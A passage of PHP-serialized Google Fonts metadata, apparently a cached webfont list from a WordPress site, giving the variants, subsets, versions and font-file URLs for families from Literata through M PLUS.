fUwAbeGVKoRYzNiCp1OUedn8zbXWSUKTt8iVow.ttf\";s:9:\"600italic\";s:110:\"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8IbLWSUKTt8iVow.ttf\";s:9:\"700italic\";s:110:\"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8GLLWSUKTt8iVow.ttf\";s:9:\"800italic\";s:110:\"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8f7LWSUKTt8iVow.ttf\";s:9:\"900italic\";s:110:\"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8VrLWSUKTt8iVow.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:676;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Liu Jian Mao Cao\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:18:\"chinese-simplified\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/liujianmaocao/v15/~ChIKEExpdSBKaWFuIE1hbyBDYW8gACoECAEYAQ==.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:677;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Livvic\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"100\";s:70:\"http://fonts.gstatic.com/s/livvic/v13/rnCr-x1S2hzjrlffC-M-mHnOSOuk.ttf\";s:9:\"100italic\";s:73:\"http://fonts.gstatic.com/s/livvic/v13/rnCt-x1S2hzjrlfXbdtakn3sTfukQHs.ttf\";s:3:\"200\";s:72:\"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlffp8IeslfCQfK9WQ.ttf\";s:9:\"200italic\";s:74:\"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbdv2s13GY_etWWIJ.ttf\";s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlffw8EeslfCQfK9WQ.ttf\";s:9:\"300italic\";s:74:\"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbduSsF3GY_etWWIJ.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/livvic/v13/rnCp-x1S2hzjrlfnb-k6unzeSA.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/livvic/v13/rnCr-x1S2hzjrlfXbeM-mHnOSOuk.ttf\";s:3:\"500\";s:72:\"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlffm8AeslfCQfK9WQ.ttf\";s:9:\"500italic\";s:74:\"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbdvKsV3GY_etWWIJ.ttf\";s:3:\"600\";s:72:\"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlfft8ceslfCQfK9WQ.ttf\";s:9:\"600italic\";s:74:\"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbdvmtl3GY_etWWIJ.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlff08YeslfCQfK9WQ.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbduCt13GY_etWWIJ.ttf\";s:3:\"900\";s:72:\"http://fonts.gstatic.com/s/livvic/v13/rnCq-x1S2hzjrlff68QeslfCQfK9WQ.ttf\";s:9:\"900italic\";s:74:\"http://fonts.gstatic.com/s/livvic/v13/rnCs-x1S2hzjrlfXbdu6tV3GY_etWWIJ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:678;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Lobster\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v28\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/lobster/v28/neILzCirqoswsqX9_oWsMqEzSJQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:679;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Lobster Two\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/lobstertwo/v18/BngMUXZGTXPUvIoyV6yN59fK7KSJ4ACD.ttf\";s:6:\"italic\";s:81:\"http://fonts.gstatic.com/s/lobstertwo/v18/BngOUXZGTXPUvIoyV6yN5-fI5qCr5RCDY_k.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/lobstertwo/v18/BngRUXZGTXPUvIoyV6yN5-92w4CByxyKeuDp.ttf\";s:9:\"700italic\";s:85:\"http://fonts.gstatic.com/s/lobstertwo/v18/BngTUXZGTXPUvIoyV6yN5-fI3hyEwRiof_DpXMY.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:680;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Londrina Outline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/londrinaoutline/v23/C8c44dM8vmb14dfsZxhetg3pDH-SfuoxrSKMDvI.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:681;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Londrina Shadow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/londrinashadow/v22/oPWX_kB4kOQoWNJmjxLV5JuoCUlXRlaSxkrMCQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:682;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Londrina Sketch\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/londrinasketch/v21/c4m41npxGMTnomOHtRU68eIJn8qfWWn5Pos6CA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:683;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Londrina Solid\";s:8:\"variants\";a:4:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":4:{s:3:\"100\";s:88:\"http://fonts.gstatic.com/s/londrinasolid/v15/flUjRq6sw40kQEJxWNgkLuudGfs9KBYesZHhV64.ttf\";s:3:\"300\";s:89:\"http://fonts.gstatic.com/s/londrinasolid/v15/flUiRq6sw40kQEJxWNgkLuudGfv1CjY0n53oTrcL.ttf\";s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/londrinasolid/v15/flUhRq6sw40kQEJxWNgkLuudGcNZIhI8tIHh.ttf\";s:3:\"900\";s:89:\"http://fonts.gstatic.com/s/londrinasolid/v15/flUiRq6sw40kQEJxWNgkLuudGfvdDzY0n53oTrcL.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:684;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Long Cang\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:18:\"chinese-simplified\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/longcang/v17/LYjAdGP8kkgoTec8zkRgrXArXN7HWQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:685;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Lora\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/lora/v26/0QI6MX1D_JOuGQbT0gvTJPa787weuyJGmKxemMeZ.ttf\";s:3:\"500\";s:80:\"http://fonts.gstatic.com/s/lora/v26/0QI6MX1D_JOuGQbT0gvTJPa787wsuyJGmKxemMeZ.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/lora/v26/0QI6MX1D_JOuGQbT0gvTJPa787zAvCJGmKxemMeZ.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/lora/v26/0QI6MX1D_JOuGQbT0gvTJPa787z5vCJGmKxemMeZ.ttf\";s:6:\"italic\";s:83:\"http://fonts.gstatic.com/s/lora/v26/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-MoFkqh8ndeZzZ0.ttf\";s:9:\"500italic\";s:83:\"http://fonts.gstatic.com/s/lora/v26/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-PgFkqh8ndeZzZ0.ttf\";s:9:\"600italic\";s:83:\"http://fonts.gstatic.com/s/lora/v26/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-BQCkqh8ndeZzZ0.ttf\";s:9:\"700italic\";s:83:\"http://fonts.gstatic.com/s/lora/v26/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-C0Ckqh8ndeZzZ0.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:686;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Love Light\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/lovelight/v3/t5tlIR0TNJyZWimpNAXDjKbCyTHuspo.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:687;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Love Ya Like A Sister\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/loveyalikeasister/v16/R70EjzUBlOqPeouhFDfR80-0FhOqJubN-Be78nZcsGGycA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:688;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Loved by the King\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/lovedbytheking/v17/Gw6gwdP76VDVJNXerebZxUMeRXUF2PiNlXFu2R64.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:689;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Lovers Quarrel\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/loversquarrel/v21/Yq6N-LSKXTL-5bCy8ksBzpQ_-zAsY7pO6siz.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:690;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Luckiest Guy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/luckiestguy/v18/_gP_1RrxsjcxVyin9l9n_j2RStR3qDpraA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:691;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Lusitana\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/lusitana/v13/CSR84z9ShvucWzsMKxhaRuMiSct_.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/lusitana/v13/CSR74z9ShvucWzsMKyDmaccqYtd2vfwk.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:692;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Lustria\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/lustria/v13/9oRONYodvDEyjuhOrCg5MtPyAcg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:693;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Luxurious Roman\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/luxuriousroman/v3/buEupou_ZcP1w0yTKxJJokVSmbpqYgckeo9RMw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:694;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Luxurious Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/luxuriousscript/v5/ahcCv9e7yydulT32KZ0rBIoD7DzMg0rOby1JtYk.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:695;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"M PLUS 1\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:4:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:87:\"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5VSe78nZcsGGycA.ttf\";s:3:\"200\";s:87:\"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW51Sa78nZcsGGycA.ttf\";s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5Cya78nZcsGGycA.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5VSa78nZcsGGycA.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5Zya78nZcsGGycA.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5iyG78nZcsGGycA.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5siG78nZcsGGycA.ttf\";s:3:\"800\";s:87:\"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW51SG78nZcsGGycA.ttf\";s:3:\"900\";s:87:\"http://fonts.gstatic.com/s/mplus1/v6/R70EjygA28ymD4HgBUGzkN5Eyoj-WpW5_CG78nZcsGGycA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:696;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"M PLUS 1 Code\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:97:\"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7iN0XHpapwmdZhY.ttf\";s:3:\"200\";s:97:\"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7gN0HHpapwmdZhY.ttf\";s:3:\"300\";s:97:\"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7jT0HHpapwmdZhY.ttf\";s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7iN0HHpapwmdZhY.ttf\";s:3:\"500\";s:97:\"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7i_0HHpapwmdZhY.ttf\";s:3:\"600\";s:97:\"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7hT13HpapwmdZhY.ttf\";s:3:\"700\";s:97:\"http://fonts.gstatic.com/s/mplus1code/v7/ypvMbXOOx2xFpzmYJS3N2_J2hBN6RZ5oIp8m_7hq13HpapwmdZhY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:697;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"M PLUS 1p\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";}s:7:\"subsets\";a:9:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:8:\"japanese\";i:6;s:5:\"latin\";i:7;s:9:\"latin-ext\";i:8;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v27\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:75:\"http://fonts.gstatic.com/s/mplus1p/v27/e3tleuShHdiFyPFzBRrQnDQAUW3aq-5N.ttf\";s:3:\"300\";s:77:\"http://fonts.gstatic.com/s/mplus1p/v27/e3tmeuShHdiFyPFzBRrQVBYge0PWovdU4w.ttf\";s:7:\"regular\";s:73:\"http://fonts.gstatic.com/s/mplus1p/v27/e3tjeuShHdiFyPFzBRro-D4Ec2jKqw.ttf\";s:3:\"500\";s:77:\"http://fonts.gstatic.com/s/mplus1p/v27/e3tmeuShHdiFyPFzBRrQDBcge0PWovdU4w.ttf\";s:3:\"700\";s:77:\"http://fonts.gstatic.com/s/mplus1p/v27/e3tmeuShHdiFyPFzBRrQRBEge0PWovdU4w.ttf\";s:3:\"800\";s:77:\"http://fonts.gstatic.com/s/mplus1p/v27/e3tmeuShHdiFyPFzBRrQWBIge0PWovdU4w.ttf\";s:3:\"900\";s:77:\"http://fonts.gstatic.com/s/mplus1p/v27/e3tmeuShHdiFyPFzBRrQfBMge0PWovdU4w.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:698;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"M PLUS 2\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:4:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:87:\"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwOa-VxlqHrzNgAw.ttf\";s:3:\"200\";s:87:\"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwua6VxlqHrzNgAw.ttf\";s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwZ66VxlqHrzNgAw.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwOa6VxlqHrzNgAw.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwC66VxlqHrzNgAw.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkw56mVxlqHrzNgAw.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkw3qmVxlqHrzNgAw.ttf\";s:3:\"800\";s:87:\"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwuamVxlqHrzNgAw.ttf\";s:3:\"900\";s:87:\"http://fonts.gstatic.com/s/mplus2/v6/7Auhp_Eq3gO_OGbGGhjdwrDdpeIBxlkwkKmVxlqHrzNgAw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:699;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"M PLUS Code Latin\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:124:\"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1EbB6i5MqF9TRwg.ttf\";s:3:\"200\";s:124:\"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1MbA6i5MqF9TRwg.ttf\";s:3:\"300\";s:124:\"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1BjA6i5MqF9TRwg.ttf\";s:7:\"regular\";s:124:\"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1EbA6i5MqF9TRwg.ttf\";s:3:\"500\";s:124:\"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1HTA6i5MqF9TRwg.ttf\";s:3:\"600\";s:124:\"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1JjH6i5MqF9TRwg.ttf\";s:3:\"700\";s:124:\"http://fonts.gstatic.com/s/mpluscodelatin/v7/hv-ylyV-aXg7x7tULiNXXBA0Np4WMS8fDIymHY8fy8wn4_ifLAtrObKDO0Xf1KHH6i5MqF9TRwg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:700;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"M PLUS Rounded 